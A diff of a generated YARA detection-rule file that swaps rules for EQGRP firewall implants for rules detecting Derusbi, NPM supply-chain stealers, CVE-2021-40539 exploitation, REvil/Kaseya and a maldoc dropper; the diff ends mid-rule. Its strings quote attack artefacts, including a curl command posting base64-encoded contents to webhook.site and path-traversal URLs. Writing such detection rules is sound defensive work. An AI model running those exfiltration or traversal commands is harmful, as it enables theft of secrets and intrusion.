-		id = "901af182-cbfa-533a-a055-565d95005d62"
-		date = "2016-08-16"
+		id = "77850332-87ce-5ed3-bb09-88e91e5bb5f6"
+		date = "2015-12-15"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1009-L1028"
+		reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_derusbi.yar#L98-L121"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "101e75800291a7603e03145bff298d7587c9b5f19102e7ba9ed3bf2b544fa5cf"
-		score = 75
+		logic_hash = "61cbdac3fd9a486d85261234698f33aa04d505b32dfec731de6fc61d103bf609"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
-		hash2 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
 
 	strings:
-		$x1 = "Implant Version-Specific Values:" fullword ascii
-		$x2 = "This function should not be used with a Netscreen, something has gone horribly wrong" fullword ascii
-		$s1 = "createSendRecv: recv'd an error from the target." fullword ascii
-		$s2 = "Error: WatchDogTimeout read returned %d instead of 4" fullword ascii
+		$s1 = { 85 C9 74 0A 31 06 01 1E 83 C6 04 49 EB F2 }
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 2000KB and 1 of ( $x* ) ) or ( 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and all of them
 }
-rule SIGNATURE_BASE_EQGRP_Implants_Gen4 : FILE
+rule SIGNATURE_BASE_Derusbi_Backdoor_Mar17_1 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120"
+		description = "Detects a variant of the Derusbi backdoor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8b2061f0-862d-51de-a7d0-7a36d3e71d61"
-		date = "2016-08-16"
+		id = "5c8838d6-b9c2-589e-b6a2-a8c7ad6f10cc"
+		date = "2017-03-03"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1030-L1051"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_derusbi.yar#L123-L143"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3bfcef33e9a0a1753fd21458ee3173284f98942d30a496c5183c79a7df960208"
+		logic_hash = "068a8d5c7378c6cf9d0369374550cd34b54e9f913aa7512a6beb46395fc15b19"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
-		hash2 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
-		hash3 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
-		hash4 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
+		hash1 = "f87915f21dcc527981ebb6db3d332b5b341129b4af83524f59d7178e9d2a3a32"
 
 	strings:
-		$s1 = "Command has not yet been coded" fullword ascii
-		$s2 = "Beacon Domain  : www.%s.com" fullword ascii
-		$s3 = "This command can only be run on a PIX/ASA" fullword ascii
-		$s4 = "Warning! Bad or missing Flash values (in section 2 of .dat file)" fullword ascii
-		$s5 = "Printing the interface info and security levels. PIX ONLY." fullword ascii
+		$x1 = "%SystemRoot%\\System32\\wiaservc.dll" fullword wide
+		$x2 = "c%WINDIR%\\PCHealth\\HelpCtr\\Binaries\\pchsvc.dll" fullword wide
+		$x3 = "%Systemroot%\\Help\\perfc009.dat" fullword wide
+		$x4 = "rundll32.exe \"%s\", R32 %s" fullword wide
+		$x5 = "OfficeUt32.dll" fullword ascii
+		$x6 = "\\\\.\\pipe\\usb%so" fullword wide
+		$x7 = "\\\\.\\pipe\\usb%si" fullword wide
+		$x8 = "\\tmp1.dat" wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 3000KB and 3 of them ) or ( all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them )
 }
-rule SIGNATURE_BASE_EQGRP_Implants_Gen3 : FILE
+rule SIGNATURE_BASE_MAL_JS_NPM_Supplychain_Attack_Sep25 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ec64bb2b-566b-50b6-a518-222afc88d400"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1053-L1076"
+		description = "Detects obfuscated JavaScript in NPM packages used in supply chain crypto stealer attacks in September 2025"
+		author = "Florian Roth"
+		id = "f9ab0aa0-2cfe-5fae-a452-2592c129e39b"
+		date = "2025-09-09"
+		modified = "2025-11-29"
+		reference = "https://www.linkedin.com/feed/update/urn:li:activity:7370889385992437760/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_npm_supply_chain_sep25.yar#L1-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "32d4dd0e35ea480199f5b2032145326c3eef73243783c580605a4de6877df982"
-		score = 75
+		logic_hash = "1b83d1bd79cdff02ed2fff7bf1feb57801ff9a933de1bd4f7ceecf738213ab4c"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
-		hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
-		hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
-		hash4 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
-		hash5 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
-		hash6 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
+		hash1 = "16f6c756bc8ce5ef5d9aa1ded0f811ec0c9cee3d8f85cc151b8ca1df7b8a4337"
 
 	strings:
-		$x1 = "incomplete and must be removed manually.)" fullword ascii
-		$s1 = "%s: recv'd an error from the target." fullword ascii
-		$s2 = "Unable to fetch the address to the get_uptime_secs function for this OS version" fullword ascii
-		$s3 = "upload/activate/de-activate/remove/cmd function failed" fullword ascii
+		$x1 = "const _0x112fa8=_0x180f;(function(_0x13c8b9" ascii
+		$fp1 = "<html"
+		$fp2 = "<xml "
+		$fp3 = "<?xml"
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 6000KB and 2 of them ) or ( all of them )
+		filesize < 200KB and 1 of ( $x* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_EQGRP_BLIAR_BLIQUER : FILE
+rule SIGNATURE_BASE_MAL_JS_NPM_Supplychain_Compromise_Sep25 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6f83bb11-f789-544e-8dca-c2dc2c845331"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1078-L1111"
+		description = "Detects a supply chain compromise in NPM packages (TinyColor, CrowdStrike etc.)"
+		author = "Florian Roth"
+		id = "ff4e1c0d-1c19-562a-be7f-5427359553cd"
+		date = "2025-09-16"
+		modified = "2025-09-17"
+		reference = "https://socket.dev/blog/tinycolor-supply-chain-attack-affects-40-packages"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_npm_supply_chain_sep25.yar#L22-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "59b7303dba0a79919d79627697a8724337145cd6d7b5c53cda970bf437162865"
-		score = 75
+		logic_hash = "6ddcf152ee8b90496d9d3f7f51dc239d927a3a2095082d13c6cc7e21819097f4"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
-		hash2 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
 
 	strings:
-		$x1 = "Do you wish to activate the implant that is already on the firewall? (y/n): " fullword ascii
-		$x2 = "There is no implant present on the firewall." fullword ascii
-		$x3 = "Implant Version :%lx%lx%lx" fullword ascii
-		$x4 = "You may now connect to the implant using the pbd idkey" fullword ascii
-		$x5 = "No reply from persistant back door." fullword ascii
-		$x6 = "rm -rf pbd.wc; wc -c %s > pbd.wc" fullword ascii
-		$p1 = "PBD_GetVersion" fullword ascii
-		$p2 = "pbd/pbdEncrypt.bin" fullword ascii
-		$p3 = "pbd/pbdGetVersion.pkt" fullword ascii
-		$p4 = "pbd/pbdStartWrite.bin" fullword ascii
-		$p5 = "pbd/pbd_setNewHookPt.pkt" fullword ascii
-		$p6 = "pbd/pbd_Upload_SinglePkt.pkt" fullword ascii
-		$s1 = "Unable to fetch hook and jmp addresses for this OS version" fullword ascii
-		$s2 = "Could not get hook and jump addresses" fullword ascii
-		$s3 = "Enter the name of a clean implant binary (NOT an image):" fullword ascii
-		$s4 = "Unable to read dat file for OS version 0x%08lx" fullword ascii
-		$s5 = "Invalid implant file" fullword ascii
+		$x1 = "if (plat === \"linux\") return \"https://github.com/trufflesecurity/trufflehog/releases"
+		$sa1 = "curl -d \"$CONTENTS\" https://webhook.site/" ascii
+		$sa2 = "curl -s -X POST -d \"$CONTENTS\" \"https://webhook.site/"
+		$sb1 = " | base64 -w 0 | " ascii
+		$sb2 = " | base64 -w0)"
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 3000KB and ( 1 of ( $x* ) or 1 of ( $p* ) ) ) or ( 3 of them )
+		filesize < 20MB and ( 1 of ( $x* ) or ( 1 of ( $sa* ) and 1 of ( $sb* ) ) ) and not uint8( 0 ) == 0x7b
 }
-rule SIGNATURE_BASE_EQGRP_Sploit : FILE
+rule SIGNATURE_BASE_LOG_EXPL_Adselfservice_CVE_2021_40539_ADSLOG_Sep21 : LOG CVE_2021_40539 FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - from files sploit.py, sploit.py"
+		description = "Detects suspicious log lines produeced during the exploitation of ADSelfService vulnerability CVE-2021-40539"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9f403965-5fb1-55b2-bef6-65c18e08e58f"
-		date = "2016-08-16"
+		id = "156317c6-e726-506d-8b07-4f74dae2807f"
+		date = "2021-09-20"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1113-L1135"
+		reference = "https://us-cert.cisa.gov/ncas/alerts/aa21-259a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_adselfservice_cve_2021_40539.yar#L2-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "083f103dee6b209626c4d790dff0e53af757945ded63409b26bbe143c78e30eb"
-		score = 75
+		logic_hash = "49b7857187c15f48e928747266adca44c227964cef72914616ea269b0e88fe73"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6"
-		hash2 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6"
+		tags = "LOG, CVE-2021-40539, FILE"
 
 	strings:
-		$s1 = "print \"[+] Connecting to %s:%s\" % (self.params.dst['ip'], self.params.dst['port'])" fullword ascii
-		$s2 = "@overridable(\"Must be overriden if the target will be touched.  Base implementation should not be called.\")" fullword ascii
-		$s3 = "@overridable(\"Must be overriden.  Base implementation should not be called.\")" fullword ascii
-		$s4 = "exp.load_vinfo()" fullword ascii
-		$s5 = "if not okay and self.terminateFlingOnException:" fullword ascii
-		$s6 = "print \"[-] keyboard interrupt before response received\"" fullword ascii
-		$s7 = "if self.terminateFlingOnException:" fullword ascii
-		$s8 = "print 'Debug info ','='*40" fullword ascii
+		$x1 = "Java traceback errors that include references to NullPointerException in addSmartCardConfig or getSmartCardConfig" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 90KB and 1 of ( $s* ) ) or ( 4 of them )
+		filesize < 50MB and 1 of them
 }
-rule SIGNATURE_BASE_EQGRP_Implants_Gen2 : FILE
+rule SIGNATURE_BASE_LOG_EXPL_Adselfservice_CVE_2021_40539_Weblog_Sep21_1 : LOG CVE_2021_40539 FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall"
+		description = "Detects suspicious log lines produeced during the exploitation of ADSelfService vulnerability CVE-2021-40539"
 		author = "Florian Roth (Nextron Systems)"
-		id = "58b0b51d-d1f8-5ee2-a4af-491c49dd0573"
-		date = "2016-08-16"
+		id = "015957a6-8778-5836-af94-6e6d3838f693"
+		date = "2021-09-20"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1137-L1168"
+		reference = "https://us-cert.cisa.gov/ncas/alerts/aa21-259a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_adselfservice_cve_2021_40539.yar#L16-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c3cbe11ae38f5affffab247cdc618d0afb5a0feda6ea4b2f43dd8edb2fbf2b11"
-		score = 75
+		logic_hash = "bc27afd63d32ac95711e5b4e70764fe0d1bcbb4b4b9b4e3f324e058bba2ef8f6"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
-		hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
-		hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
-		hash4 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
-		hash5 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
-		hash6 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
+		tags = "LOG, CVE-2021-40539, FILE"
 
 	strings:
-		$x1 = "Modules persistence file written successfully" fullword ascii
-		$x2 = "Modules persistence data successfully removed" fullword ascii
-		$x3 = "No Modules are active on the firewall, nothing to persist" fullword ascii
-		$s1 = "--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s " fullword ascii
-		$s2 = "Error while attemping to persist modules:" fullword ascii
-		$s3 = "Error while reading interface info from PIX" fullword ascii
-		$s4 = "LP.c:pixFree - Failed to get response" fullword ascii
-		$s5 = "WARNING: LP Timeout specified (%lu seconds) less than default (%u seconds).  Setting default" fullword ascii
-		$s6 = "Unable to fetch config address for this OS version" fullword ascii
-		$s7 = "LP.c: interface information not available for this session" fullword ascii
-		$s8 = "[%s:%s:%d] ERROR: " fullword ascii
-		$s9 = "extract_fgbg" fullword ascii
+		$x1 = "/ServletApi/../RestApi/LogonCustomization" ascii wide
+		$x2 = "/ServletApi/../RestAPI/Connection" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 3000KB and 1 of ( $x* ) ) or ( 5 of them )
+		filesize < 50MB and 1 of them
 }
-rule SIGNATURE_BASE_EQGRP_Implants_Gen1 : FILE
+rule SIGNATURE_BASE_CVE_2015_1674_CNGSYS : CVE_2015_1674 FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall"
+		description = "Detects exploits for CVE-2015-1674"
 		author = "Florian Roth (Nextron Systems)"
-		id = "af0a1a2c-0efb-568f-9e80-baee7398fea2"
-		date = "2016-08-16"
+		id = "1161b395-a19e-5aac-8416-8a4e60aeca37"
+		date = "2015-05-14"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1170-L1199"
+		reference = "http://www.binvul.com/viewthread.php?tid=508"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2015_1674.yar#L10-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1493f78e74503c367e3c5d8eac32167a7ad34d2435eba00e1f7bf864682e10a5"
+		hash = "af4eb2a275f6bbc2bfeef656642ede9ce04fad36"
+		logic_hash = "d751ef739a6fb8b0871f92cb4aba21544f444944710407c723f0452dc3b85522"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = "CVE-2015-1674, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
-		hash2 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
-		hash3 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
-		hash4 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
-		hash5 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
-		hash6 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
-		hash7 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
-		hash8 = "ee3e3487a9582181892e27b4078c5a3cb47bb31fc607634468cc67753f7e61d7"
-		hash9 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
 
 	strings:
-		$s1 = "WARNING:  Session may not have been closed!" fullword ascii
-		$s2 = "EXEC Packet Processed" fullword ascii
-		$s3 = "Failed to insert the command into command list." fullword ascii
-		$s4 = "Send_Packet: Trying to send too much data." fullword ascii
-		$s5 = "payloadLength >= MAX_ALLOW_SIZE." fullword ascii
-		$s6 = "Wrong Payload Size" fullword ascii
-		$s7 = "Unknown packet received......" fullword ascii
-		$s8 = "Returned eax = %08x" fullword ascii
+		$s1 = "\\Device\\CNG" wide
+		$s2 = "GetProcAddress" fullword ascii
+		$s3 = "LoadLibrary" ascii
+		$s4 = "KERNEL32.dll" fullword ascii
+		$s5 = "ntdll.dll" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 6000KB and ( 2 of ( $s* ) ) ) or ( 5 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
 }
-rule SIGNATURE_BASE_EQGRP_Eligiblebombshell_Generic : FILE
+
+rule SIGNATURE_BASE_APT_MAL_Revil_Kaseya_Jul21_1 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - from files eligiblebombshell_1.2.0.1.py, eligiblebombshell_1.2.0.1.py"
+		description = "Detects malware used in the Kaseya supply chain attack"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7abe53f6-9880-523a-b71f-6e3850047764"
-		date = "2016-08-16"
+		id = "7356f4ea-183f-52ec-a167-fc16b8bfb55a"
+		date = "2021-07-02"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1201-L1218"
+		reference = "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_revil_general.yar#L3-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a2e13300736f99aff30c7b4f7f0b148d62ecb1e72435a3e15e4f85b30d904ffd"
+		logic_hash = "a7f9fa8f8e8a3a25728aa6a334924e0b4075f3422df6b92a2f544bb0ebb6bfad"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "dd0e3ae6e1039a755bf6cb28bf726b4d6ab4a1da2392ba66d114a43a55491eb1"
-		hash2 = "dd0e3ae6e1039a755bf6cb28bf726b4d6ab4a1da2392ba66d114a43a55491eb1"
+		hash1 = "1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e"
+		hash2 = "aae6e388e774180bc3eb96dad5d5bfefd63d0eb7124d68b6991701936801f1c7"
+		hash3 = "dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f"
+		hash4 = "df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e"
 
 	strings:
-		$s1 = "logging.error(\"       Perhaps you should run with --scan?\")" fullword ascii
-		$s2 = "logging.error(\"ERROR: No entry for ETag [%s] in %s.\" %" fullword ascii
-		$s3 = "\"be supplied\")" fullword ascii
+		$s1 = "Mpsvc.dll" wide fullword
+		$s2 = ":0:4:8:<:@:D:H:L:P:T:X:\\:`:d:h:l:p:t:x:H<L<P<\\<`<" ascii fullword
+		$op1 = { 40 87 01 c3 6a 08 68 f8 0e 41 00 e8 ae db ff ff be 80 25 41 00 39 35 ?? 32 41 00 }
+		$op2 = { 8b 40 04 2b c2 c1 f8 02 3b c8 0f 84 56 ff ff ff 68 15 50 40 00 2b c1 6a 04 }
+		$op3 = { 74 73 db e2 e8 ad 07 00 00 68 60 1a 40 00 e8 8f 04 00 00 e8 3a 05 00 00 50 e8 25 26 00 00 }
+		$op4 = { 75 05 8b 45 fc eb 4c c7 45 f8 00 00 00 00 6a 00 8d 45 f0 50 8b 4d 0c }
+		$op5 = { 83 7d 0c 00 75 05 8b 45 fc eb 76 6a 00 68 80 00 00 00 6a 01 6a 00 }
 
 	condition:
-		( filesize < 70KB and 2 of ( $s* ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "c36dcd2277c4a707a1a645d0f727542a" or 2 of them )
 }
-rule SIGNATURE_BASE_EQGRP_Ssh_Telnet_29 : FILE
+rule SIGNATURE_BASE_APT_MAL_Revil_Kaseya_Jul21_2 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - from files ssh.py, telnet.py"
+		description = "Detects malware used in the Kaseya supply chain attack"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cc6edf63-f7ef-579a-82c5-28e5012561e0"
-		date = "2016-08-16"
+		id = "38b168d4-e761-544e-9859-eb155bbfe54a"
+		date = "2021-07-02"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1220-L1241"
+		reference = "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_revil_general.yar#L32-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e93a54f4de089d460bfb966feacc377c0467863f481a210c81970f4909fb3bd8"
+		logic_hash = "44948d93c71370a9976f22bf78cd1af80359f2c9804ea7995791109785cfaf84"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "630d464b1d08c4dfd0bd50552bee2d6a591fb0b5597ecebaa556a3c3d4e0aa4e"
-		hash2 = "07f4c60505f4d5fb5c4a76a8c899d9b63291444a3980d94c06e1d5889ae85482"
+		hash1 = "0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402"
+		hash2 = "8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd"
+		hash3 = "cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6"
+		hash4 = "d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f"
+		hash5 = "d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20"
+		hash6 = "e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2"
 
 	strings:
-		$s1 = "received prompt, we're in" fullword ascii
-		$s2 = "failed to login, bad creds, abort" fullword ascii
-		$s3 = "sending command \" + str(n) + \"/\" + str(tot) + \", len \" + str(len(chunk) + " fullword ascii
-		$s4 = "received nat - EPBA: ok, payload: mangled, did not run" fullword ascii
-		$s5 = "no status returned from target, could be an exploit failure, or this is a version where we don't expect a stus return" ascii
-		$s6 = "received arp - EPBA: ok, payload: fail" fullword ascii
-		$s7 = "chopped = string.rstrip(payload, \"\\x0a\")" fullword ascii
+		$opa1 = { 8b 4d fc 83 c1 01 89 4d fc 81 7d f0 ff 00 00 00 77 1? ba 01 00 00 00 6b c2 00 8b 4d 08 }
+		$opa2 = { 89 45 f0 8b 4d fc 83 c1 01 89 4d fc 81 7d f0 ff 00 00 00 77 1? ba 01 00 00 00 6b c2 00 }
+		$opa3 = { 83 c1 01 89 4d fc 81 7d f0 ff 00 00 00 77 1? ba 01 00 00 00 6b c2 00 8b 4d 08 0f b6 14 01 }
+		$opa4 = { 89 45 f4 8b 0d ?? ?0 07 10 89 4d f8 8b 15 ?? ?1 07 10 89 55 fc ff 75 fc ff 75 f8 ff 55 f4 }
+		$opb1 = { 18 00 10 bd 18 00 10 bd 18 00 10 0e 19 00 10 cc cc cc }
+		$opb2 = { 18 00 10 0e 19 00 10 cc cc cc cc 8b 44 24 04 }
+		$opb3 = { 10 c4 18 00 10 bd 18 00 10 bd 18 00 10 0e 19 00 10 cc cc }
 
 	condition:
-		( filesize < 10KB and 2 of them ) or ( 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 2 of ( $opa* ) or 3 of them )
 }
-rule SIGNATURE_BASE_EQGRP_Tinyexec : FILE
+rule SIGNATURE_BASE_APT_MAL_Maldoc_Cloudatlas_Oct20_1 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - from files tinyexec"
+		description = "Detects unknown maldoc dropper noticed in October 2020"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b783bafd-52e2-59e8-98ab-47de3250415e"
-		date = "2016-08-16"
+		id = "e7caf2b2-caf2-5984-a792-8224f2641bda"
+		date = "2020-10-13"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1245-L1258"
+		reference = "https://twitter.com/jfslowik/status/1316050637092651009"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cloudatlas.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "19b8d7e946d72424f81cd48ad4bf8791bf50a4cc146866e55ad501443a8d1e45"
+		logic_hash = "772bdd8ec89edf2054e675e9ecb321a7bfe0307a7086a4e5b65f8d8b8cf80ecc"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7ba76b2311736dbcd4f2817c40dae78f223366f2404571cd16d6676c7a640d70"
 
 	strings:
-		$s1 = { 73 68 73 74 72 74 61 62 00 2E 74 65 78 74 }
-		$s2 = { 5A 58 55 52 89 E2 55 50 89 E1 }
+		$x1 = "https://msofficeupdate.org" wide
 
 	condition:
